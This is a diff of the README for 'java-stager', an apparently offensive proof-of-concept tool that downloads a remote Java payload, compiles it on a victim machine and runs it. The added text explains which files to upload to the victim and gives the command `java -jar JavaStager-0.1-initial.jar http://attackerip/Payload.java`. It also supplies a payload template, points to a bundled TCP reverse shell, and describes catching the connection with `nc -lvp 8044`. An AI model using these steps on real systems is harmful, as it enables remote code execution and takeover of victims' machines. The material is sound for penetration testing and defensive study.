cornerpirate/java-stager/README.md

 `Building jar: C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jar`

-Assuming you have generated the same Jar file the stager will run if you execute this in the "java-stager" folder:

-`java -cp target/JavaStager-0.1-initial.jar Stager`

-As I was just doing a PoC I have not figured out how to make Maven do all the nice things to make this a simpler Jar to execute.
-But who knows you can probably run with the ball here.
-To test I uploaded the full "java-stager" folder to a VM (playing the victim) which isn't that mobile but was sufficient.
+To work on your victim you must upload the "JavaStager*.jar" file and the "lib" folder containing Janino from the "target" folder.

-The above will call the "Stager" class which has a main method.
+The following command will execute the stager:

+`java -jar JavaStager-0.1-initial.jar`

 You will be prompted with the usage as shown:

 `Proper Usage is: java Stager <url>`

 The "url" is the only parameter that is passed to Stager.

-Configure your "payload.java" file to service your needs.
-In my PoC the Stager will invoke the "revshell" method in the "payload" object.
-Before looking to exploit a system you will want to check that your payload compiles cleanly or it will fail on the victim.
-When you are happy you can host the ".java" file (uncompiled) on a web server.
-I have a blog post covering basic HTTP/HTTPS servers with python 2 and 3 available here:
+An example usage would be:

+`java -jar JavaStager-0.1-initial.jar http://attackerip/Payload.java`

+Your payload must be in a file called "Payload.java" and your exploit code must be in a static method called "Run".
+The following shows the template if you want to write your own:

+`
+public class Payload {
+   public static void Run() {
+      // Your code here
+   }
+}
+`

+I have provided an example Reverse TCP payload in the file "TCPReverseShell.java".
+To prevent name clashes this is not called "Payload.java" and the class name is wrong.
+The header comment in "TCPReverseShell.java" explains how to modify it to work.

+You will need to host your "Payload.java" file on an HTTP server.
+You can use Apache if you want or simple HTTP/HTTPS services in Python2 and Python3 as per my blog:

 https://cornerpirate.com/2016/12/16/simple-http-or-https-servers/

+The attacker will need to start a netcat listener to catch the connection back using the standard `nc -lvp 8044` technique.